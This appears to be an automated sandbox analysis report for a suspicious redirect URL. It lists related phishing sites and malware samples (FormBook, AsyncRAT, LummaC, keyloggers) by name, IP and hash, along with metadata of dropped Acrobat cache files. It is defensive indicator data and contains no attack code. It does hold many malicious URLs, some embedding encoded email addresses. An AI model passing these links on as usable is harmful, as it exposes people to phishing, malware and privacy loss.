                                                                                    Screenshothttps://www.teleboario.it/teleboario_adv.php?variable=403&url=%2F%2Fplasticoscorrea.com.br%2Fscript%2F%23Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29t
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    104.21.48.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                    • twirpx.org/administrator/index.php
                                                                                    SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.antipromil.site/7ykh/
                                                                                    104.18.94.41https://meliopayments.cloudfilesbureau.com/j319CGet hashmaliciousHTMLPhisherBrowse
                                                                                      https://laserglow-technologies-industrial-48815730.hubspotpagebuilder.com/laserglowGet hashmaliciousHTMLPhisherBrowse
                                                                                        https://booking.pathqerunknowns.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                          https://mo.iecxtug.ru/eoQpd/Get hashmaliciousUnknownBrowse
                                                                                            Condenast eCHECK- Payment Advice.htmlGet hashmaliciousUnknownBrowse
                                                                                              https://www.google.at/url?sa==ChR6Fb4oMA7qoNPeAF0HryTWGOi&rct=mCcPfNgQLHn7TqSCLwLAghdNeRqdmhaOmrXNGpkofpekJnfvmVMTgxKB7tJBUVJOPR&sa=t&url=amp/joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29tGet hashmaliciousUnknownBrowse
                                                                                                https://ik.imagekit.io/nrof2h909/Paul%20W.%20Shaffer.pdf?updatedAt=1736369068440Get hashmaliciousHTMLPhisherBrowse
                                                                                                  https://ar.inderave.ru/jKDI30/#Tapodoll@wc.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                    https://clicktoviewdocumentonadovemacroreader.federalcourtbiz.com/lhvBR/?e=amFtZXMuYm9zd2VsbEBvdmVybGFrZWhvc3BpdGFsLm9yZw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                      https://workdrive.zohopublic.com/writer/open/p369v1c9203e54b114ff78bf68159454d9c26Get hashmaliciousUnknownBrowse
                                                                                                        151.101.130.137http://mi-outlook-loggin.click/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-1.11.3.min.js
                                                                                                        http://imaps-support.us/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-1.11.3.min.js
                                                                                                        http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-1.7.min.js
                                                                                                        https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AING.shalominternationalministry.com/index.xml%23?email=amFtZXMubGVhZGJlYXRlckBsb2dpY2FsaXMuY29tGet hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-3.3.1.min.js
                                                                                                        http://site9613885.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                                                                                        • code.jquery.com/jquery-1.7.2.min.js
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        s-part-0017.t-0009.t-msedge.netPO_62401394_MITech_20250701.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 13.107.246.45
                                                                                                        Fqtwswg.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 13.107.246.45
                                                                                                        BPD-003777.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 13.107.246.45
                                                                                                        new.batGet hashmaliciousUnknownBrowse
                                                                                                        • 13.107.246.45
                                                                                                        https://bryf.atchirlisc.ru/EeMAGvIe/Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 13.107.246.45
                                                                                                        Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        • 13.107.246.45
                                                                                                        24EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 13.107.246.45
                                                                                                        VmjvNTbD5J.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 13.107.246.45
                                                                                                        https://combatironapparel.com/collections/ranger-panty-shortsGet hashmaliciousUnknownBrowse
                                                                                                        • 13.107.246.45
                                                                                                        cLm7ThwEvh.msiGet hashmaliciousUnknownBrowse
                                                                                                        • 13.107.246.45
                                                                                                        default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comJB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 217.20.57.25
                                                                                                        82eqjqLrzE.exeGet hashmaliciousAsyncRATBrowse
                                                                                                        • 217.20.57.23
                                                                                                        Solara.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 217.20.57.35
                                                                                                        Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                                                                                        • 84.201.210.39
                                                                                                        file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zipGet hashmaliciousUnknownBrowse
                                                                                                        • 217.20.57.36
                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 217.20.57.18
                                                                                                        Insomia.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 84.201.210.35
                                                                                                        T1#U5b89#U88c5#U53052.0.6.msiGet hashmaliciousUnknownBrowse
                                                                                                        • 84.201.210.34
                                                                                                        dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 84.201.210.22
                                                                                                        Dd5DwDCHJD.exeGet hashmaliciousQuasarBrowse
                                                                                                        • 217.20.57.35
                                                                                                        bg.microsoft.map.fastly.netnew.batGet hashmaliciousUnknownBrowse
                                                                                                        • 199.232.210.172
                                                                                                        MDE_File_Sample_c404ec52446527b77da6860ca493ea2007ac03d5.zipGet hashmaliciousUnknownBrowse
                                                                                                        • 199.232.210.172
                                                                                                        JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 199.232.210.172
                                                                                                        bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                                        • 199.232.210.172
                                                                                                        GT98765009064.xlsxGet hashmaliciousUnknownBrowse
                                                                                                        • 199.232.214.172
                                                                                                        SmartDeploy.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 199.232.210.172
                                                                                                        82eqjqLrzE.exeGet hashmaliciousAsyncRATBrowse
                                                                                                        • 199.232.214.172
                                                                                                        EEdSGSana5.exeGet hashmaliciousAsyncRATBrowse
                                                                                                        • 199.232.210.172
                                                                                                        Magicleap-bonus disbursment.pdfGet hashmaliciousUnknownBrowse
                                                                                                        • 199.232.210.172
                                                                                                        eqRHH2whJu.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 199.232.210.172
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        CLOUDFLARENETUSQUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 104.21.32.1
                                                                                                        sora.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 8.44.60.40
                                                                                                        QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                                        • 104.21.13.141
                                                                                                        https://enterprisefocus.benchurl.com/c/l?u=11FC0F0E&e=193CF6A&c=173A1E&&t=0&l=11D51F9C4&email=s8sR2EUS6pcTEMAyWZX%2BTfGL0c%2FIo%2Bud&seq=2Get hashmaliciousUnknownBrowse
                                                                                                        • 104.17.25.14
                                                                                                        Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 104.21.16.1
                                                                                                        Order_List.scr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                        • 104.21.64.1
                                                                                                        Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 104.21.16.1
                                                                                                        Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                                                        • 172.64.155.59
                                                                                                        https://ccml.io/Get hashmaliciousUnknownBrowse
                                                                                                        • 104.17.24.14
                                                                                                        http://readermodeext.infoGet hashmaliciousUnknownBrowse
                                                                                                        • 1.1.1.1
                                                                                                        FASTLYUSBenefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                                                        • 199.232.210.172
                                                                                                        https://ccml.io/Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.129.140
                                                                                                        https://bryf.atchirlisc.ru/EeMAGvIe/Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.2.137
                                                                                                        http://zwibbdq.trackbest.click/6/128767/262/1494/873186/403/9/4avg5x4ni5Get hashmaliciousUnknownBrowse
                                                                                                        • 151.101.194.137
                                                                                                        https://combatironapparel.com/collections/ranger-panty-shortsGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.2.133
                                                                                                        https://meliopayments.cloudfilesbureau.com/j319CGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.2.137
                                                                                                        https://identity.thoughtspotlogin.cloud/Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.66.137
                                                                                                        https://booking.pathqerunknowns.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                        • 151.101.2.137
                                                                                                        colleague[1].htmGet hashmaliciousUnknownBrowse
                                                                                                        • 151.101.129.229
                                                                                                        https://identity.login-authenticate.cloud/Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 151.101.130.137
                                                                                                        OIS1USEmployee_Letter.PDFuJPefyDW1j.urlGet hashmaliciousUnknownBrowse
                                                                                                        • 162.241.2.141
                                                                                                        http://kiesermedicalcorporation.com/mklakdjhfhm/yftguihjo/anRvcnRvcmljaUBiaWdnZS5jb20=Get hashmaliciousUnknownBrowse
                                                                                                        • 162.241.3.4
                                                                                                        http://kiesermedicalcorporation.com/mklakdjhfhm/yftguihjo/anRvcnRvcmljaUBiaWdnZS5jb20=Get hashmaliciousUnknownBrowse
                                                                                                        • 162.241.3.4
                                                                                                        http://prntbl.concejomunicipaldechinu.gov.coGet hashmaliciousUnknownBrowse
                                                                                                        • 162.241.85.146
                                                                                                        https://inboxsender.gxsearch.club/redir6/serial.phpGet hashmaliciousUnknownBrowse
                                                                                                        • 162.241.2.244
                                                                                                        MN1qo2qaJmEvXDP.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 192.185.147.100
                                                                                                        https://jet.cloudhostingworks.com/CetQr/Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 162.241.71.126
                                                                                                        wva4mZuUb4.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                        • 162.241.203.30
                                                                                                        Xc501VOacR.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                        • 162.241.203.30
                                                                                                        umVoLahqZn.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                        • 162.241.203.30
                                                                                                        CLOUDFLARENETUSQUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 104.21.32.1
                                                                                                        sora.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 8.44.60.40
                                                                                                        QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                                        • 104.21.13.141
                                                                                                        https://enterprisefocus.benchurl.com/c/l?u=11FC0F0E&e=193CF6A&c=173A1E&&t=0&l=11D51F9C4&email=s8sR2EUS6pcTEMAyWZX%2BTfGL0c%2FIo%2Bud&seq=2Get hashmaliciousUnknownBrowse
                                                                                                        • 104.17.25.14
                                                                                                        Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 104.21.16.1
                                                                                                        Order_List.scr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                        • 104.21.64.1
                                                                                                        Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 104.21.16.1
                                                                                                        Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                                                        • 172.64.155.59
                                                                                                        https://ccml.io/Get hashmaliciousUnknownBrowse
                                                                                                        • 104.17.24.14
                                                                                                        http://readermodeext.infoGet hashmaliciousUnknownBrowse
                                                                                                        • 1.1.1.1
                                                                                                        No context
                                                                                                        No context
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):294
                                                                                                        Entropy (8bit):5.200589376071022
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:iOrGz3+q2PsHO2nKuAl9OmbnIFUtJGc+ZmwPGc6VkwOsHO2nKuAl9OmbjLJ:74OvkHVHAahFUtZ+/by51HVHAaSJ
                                                                                                        MD5:D4DCE4A7BFE47041951E18362F28D7D9
                                                                                                        SHA1:A375237AF336D7C14BB1A0BAA9592604EEA3DB03
                                                                                                        SHA-256:AC6274D7841BFF8935BBA457DD75739CE4483CA32CA74AEB389489A4811EC8A4
                                                                                                        SHA-512:4CF2A89037408BC9470AFB275589F2B748A66BB3FAF74B105449061FB2AEAEDA2DAB68AE2B650F0C2F1928BFA2DEFEDD1A1E3DA089A0BA1E6F000DAF6BEBC9C9
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:2025/01/09-11:17:48.155 1b78 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/09-11:17:48.157 1b78 Recovering log #3.2025/01/09-11:17:48.157 1b78 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):294
                                                                                                        Entropy (8bit):5.200589376071022
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:iOrGz3+q2PsHO2nKuAl9OmbnIFUtJGc+ZmwPGc6VkwOsHO2nKuAl9OmbjLJ:74OvkHVHAahFUtZ+/by51HVHAaSJ
                                                                                                        MD5:D4DCE4A7BFE47041951E18362F28D7D9
                                                                                                        SHA1:A375237AF336D7C14BB1A0BAA9592604EEA3DB03
                                                                                                        SHA-256:AC6274D7841BFF8935BBA457DD75739CE4483CA32CA74AEB389489A4811EC8A4
                                                                                                        SHA-512:4CF2A89037408BC9470AFB275589F2B748A66BB3FAF74B105449061FB2AEAEDA2DAB68AE2B650F0C2F1928BFA2DEFEDD1A1E3DA089A0BA1E6F000DAF6BEBC9C9
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:2025/01/09-11:17:48.155 1b78 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/09-11:17:48.157 1b78 Recovering log #3.2025/01/09-11:17:48.157 1b78 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):335
                                                                                                        Entropy (8bit):5.137630437059603
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:iOrGi31L+q2PsHO2nKuAl9Ombzo2jMGIFUtJGq11ZmwPGnTN1LVkwOsHO2nKuAlx:7tlyvkHVHAa8uFUt1X/qTN1R51HVHAaU
                                                                                                        MD5:C9B9AEA3912B4969A3F2B4C217F2C957
                                                                                                        SHA1:0B82B008FE11E9566AE41E110B3FBFE8DFEF493C
                                                                                                        SHA-256:BA8D78B8C9683EE77343A0019967C6C2ED2AD95343B365C60B822578FD029753
                                                                                                        SHA-512:675068657AED0EC6F48376FC0112B4FDEFB471034709F916CFD26F68BFA739BC8300EC08E2CF558857BC431D2045C9BB2AE500D1999940527183E288690434AF
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:2025/01/09-11:17:48.000 1c8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/09-11:17:48.004 1c8 Recovering log #3.2025/01/09-11:17:48.005 1c8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):335
                                                                                                        Entropy (8bit):5.137630437059603
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:iOrGi31L+q2PsHO2nKuAl9Ombzo2jMGIFUtJGq11ZmwPGnTN1LVkwOsHO2nKuAlx:7tlyvkHVHAa8uFUt1X/qTN1R51HVHAaU
                                                                                                        MD5:C9B9AEA3912B4969A3F2B4C217F2C957
                                                                                                        SHA1:0B82B008FE11E9566AE41E110B3FBFE8DFEF493C
                                                                                                        SHA-256:BA8D78B8C9683EE77343A0019967C6C2ED2AD95343B365C60B822578FD029753
                                                                                                        SHA-512:675068657AED0EC6F48376FC0112B4FDEFB471034709F916CFD26F68BFA739BC8300EC08E2CF558857BC431D2045C9BB2AE500D1999940527183E288690434AF
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:2025/01/09-11:17:48.000 1c8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/09-11:17:48.004 1c8 Recovering log #3.2025/01/09-11:17:48.005 1c8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:modified
                                                                                                        Size (bytes):476
                                                                                                        Entropy (8bit):4.975978723369712
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:YH/um3RA8sqejsBdOg2HMcaq3QYiubEP7E4T3y:Y2sRdsRkdMHv3QYhbY7nby
                                                                                                        MD5:F992EB2B09B5FE4930B431E520EA50BB
                                                                                                        SHA1:70C99A06A303F1674BCD6389381943FDC08F37EC
                                                                                                        SHA-256:768C5CE439E505EBF86F4F577FA7CD3566278B87579417730DDB12F3B16C54C8
                                                                                                        SHA-512:3405C4E71FC5824AF46A5943428FE7CCB52C4390A0B836AE5E6875E8E5BAA4F45148CF0AAD50FA69A7FBAFD977A93AE61FF546A75B33C3E37CAC0DDD5D911C7E
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380999479897150","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":136363},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.17","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):476
                                                                                                        Entropy (8bit):4.975978723369712
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:YH/um3RA8sqejsBdOg2HMcaq3QYiubEP7E4T3y:Y2sRdsRkdMHv3QYhbY7nby
                                                                                                        MD5:F992EB2B09B5FE4930B431E520EA50BB
                                                                                                        SHA1:70C99A06A303F1674BCD6389381943FDC08F37EC
                                                                                                        SHA-256:768C5CE439E505EBF86F4F577FA7CD3566278B87579417730DDB12F3B16C54C8
                                                                                                        SHA-512:3405C4E71FC5824AF46A5943428FE7CCB52C4390A0B836AE5E6875E8E5BAA4F45148CF0AAD50FA69A7FBAFD977A93AE61FF546A75B33C3E37CAC0DDD5D911C7E
                                                                                                        Malicious:false
                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380999479897150","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":136363},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.17","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):6391
                                                                                                        Entropy (8bit):5.244811064389246
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:TUi8h+F8Aj8DRCGwtqzmsLnNreR2ZpjRe4I8qr9jnNI92D3jC+3ETKEAE8gzYQI:jX8eQS
                                                                                                        MD5:F4E407F7FEC45444A21BCC6B37A300A8
                                                                                                        SHA1:9AE41C31B0A259FE19DE7D9C9ECEBB7B7FE0D507
                                                                                                        SHA-256:D6E06961E81DF6AD9035496EC123F2DDBD169AA244B51DA80FBE3688D47F9352
                                                                                                        SHA-512:92A07EC717B180A9F843D8A4D60A6173E027344F8CCF4D1FB4683D27D8D48BA05BE5D07D860E60B48DF03D9C1282BB06EAF1F02166BA7AE5845D67B4EEE82FBB
                                                                                                        Malicious:false
                                                                                                        Preview:*...#................version.1..namespace-....o................next-map-id.1.Pnamespace-42000ee3_e7f8_4e1a_acf9_c35e414a379e-https://rna-resource.acrobat.com/.0F...r................next-map-id.2.Snamespace-c3e8f6d4_f714_436a_92db_f0a4810aae6e-https://rna-v2-resource.acrobat.com/.1.p..r................next-map-id.3.Snamespace-d0743b68_de08_4f3c_b7bc_aca178ee7ff1-https://rna-v2-resource.acrobat.com/.2....o................next-map-id.4.Pnamespace-ce27b6a8_7896_4616_ab45_36a5ede234ad-https://rna-resource.acrobat.com/.3..).^...............Pnamespace-42000ee3_e7f8_4e1a_acf9_c35e414a379e-https://rna-resource.acrobat.com/...^...............Pnamespace-ce27b6a8_7896_4616_ab45_36a5ede234ad-https://rna-resource.acrobat.com/.{VUa...............Snamespace-c3e8f6d4_f714_436a_92db_f0a4810aae6e-https://rna-v2-resource.acrobat.com/....a...............Snamespace-d0743b68_de08_4f3c_b7bc_aca178ee7ff1-https://rna-v2-resource.acrobat.com/yATuo................next-map-id.5.Pnamespace-eb3aef6d_d129_430c_a353_
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):323
                                                                                                        Entropy (8bit):5.164235261674936
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:iOrGD1L+q2PsHO2nKuAl9OmbzNMxIFUtJGJz1ZmwPGMP1LVkwOsHO2nKuAl9Ombg:7wyvkHVHAa8jFUtA/f1R51HVHAa84J
                                                                                                        MD5:C8286EF76715596A645B20F6FF723BF0
                                                                                                        SHA1:20C7BC76143B27EAD97F2E0E6A044814AD799BB6
                                                                                                        SHA-256:A97D56ADDFCB2A016D8AE4E31EFBC6B8B2E2E89FF8E42546305A42ECF8541A86
                                                                                                        SHA-512:347728A1B6E0233D6D7CCE79ECC0FBB4B88112DD1DB57C0EEC76300EEC8DDCB4693965DAB5CBEFDE96FE316D5AEB6E98985EA10A9E77C50FBC8B98916754DFCB
                                                                                                        Malicious:false
                                                                                                        Preview:2025/01/09-11:17:48.212 1c8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/09-11:17:48.214 1c8 Recovering log #3.2025/01/09-11:17:48.217 1c8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):323
                                                                                                        Entropy (8bit):5.164235261674936
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:iOrGD1L+q2PsHO2nKuAl9OmbzNMxIFUtJGJz1ZmwPGMP1LVkwOsHO2nKuAl9Ombg:7wyvkHVHAa8jFUtA/f1R51HVHAa84J
                                                                                                        MD5:C8286EF76715596A645B20F6FF723BF0
                                                                                                        SHA1:20C7BC76143B27EAD97F2E0E6A044814AD799BB6
                                                                                                        SHA-256:A97D56ADDFCB2A016D8AE4E31EFBC6B8B2E2E89FF8E42546305A42ECF8541A86
                                                                                                        SHA-512:347728A1B6E0233D6D7CCE79ECC0FBB4B88112DD1DB57C0EEC76300EEC8DDCB4693965DAB5CBEFDE96FE316D5AEB6E98985EA10A9E77C50FBC8B98916754DFCB
                                                                                                        Malicious:false
                                                                                                        Preview:2025/01/09-11:17:48.212 1c8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/09-11:17:48.214 1c8 Recovering log #3.2025/01/09-11:17:48.217 1c8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                                                                                                        Category:dropped
                                                                                                        Size (bytes):71190
                                                                                                        Entropy (8bit):2.2182549384547596
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:X2QMZiZ5tRqinNW9Wx0pOf+QORS5xEa4/NVZCE24T3rtP:m6B1+tKQLCE7Xp
                                                                                                        MD5:E02E0A8893F676227B2C9EF1E99A9103
                                                                                                        SHA1:D64486AE70E230B20689368BC0893E0142002061
                                                                                                        SHA-256:9EC9F650643A7DC984C3E03E422788ADF294BE7B011E70B8BB30C6E5742C9281
                                                                                                        SHA-512:2435EC03DFD1950DA7041CEADE5548C48305B5432E98E5BC5924560CA1C49011E11AFC5608BC9A8BE5189AA6951CD05FAFF4D86E9994F78A8CD2C8FF3A21A96E
                                                                                                        Malicious:false
                                                                                                        Preview:BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                                                                                        Category:dropped
                                                                                                        Size (bytes):86016
                                                                                                        Entropy (8bit):4.444625732518047
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:yeZci5t5iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:Fas3OazzU89UTTgUL
                                                                                                        MD5:2E31364244719C34CA54AA8F119FCDDF
                                                                                                        SHA1:36500BE3721D7A208B310359D725331B13D4EC19
                                                                                                        SHA-256:5EE1AA8F0D0EBCF54E35B9EDE67F577C6488AB85E67BE045F66DEBBA8AE3C7EB
                                                                                                        SHA-512:72EF8B949088AEA9818B4D205EE971FA796DCC0F106A402A7E30886F1F49DA8670430B3C3E3A111957B5975F1705ADF722613002F665F058F79AF8765AC761E6
                                                                                                        Malicious:false
                                                                                                        Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:SQLite Rollback Journal
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8720
                                                                                                        Entropy (8bit):3.7684986168425234
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:7MLJioyVyioyMoy1C7oy16oy18KOioy1noy1AYoy1Wioy1oioykioyBoy1noy1Or:7MJuyg/XjBinb9IVXEBodRBkg
                                                                                                        MD5:DAED0FCF4948C1B7FE1F9D4DD1054FDA
                                                                                                        SHA1:32A3D8934C71C11C3D5833E51E258DE5643CF5F0
                                                                                                        SHA-256:A1350525E9638EF98DC119E8B0260488ED0FBF23105249FCDF43B41390D1106A
                                                                                                        SHA-512:543069ABC5C70F90057A6880904E791F409BD860E7908E4CD10B229A5C895C41A59627FBE2412E478B582AD4A1A220FABC76B9BD89E11122B91E3368F7A015AA
                                                                                                        Malicious:false
                                                                                                        Preview:.... .c......z.p...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:Certificate, Version=3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1391
                                                                                                        Entropy (8bit):7.705940075877404
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
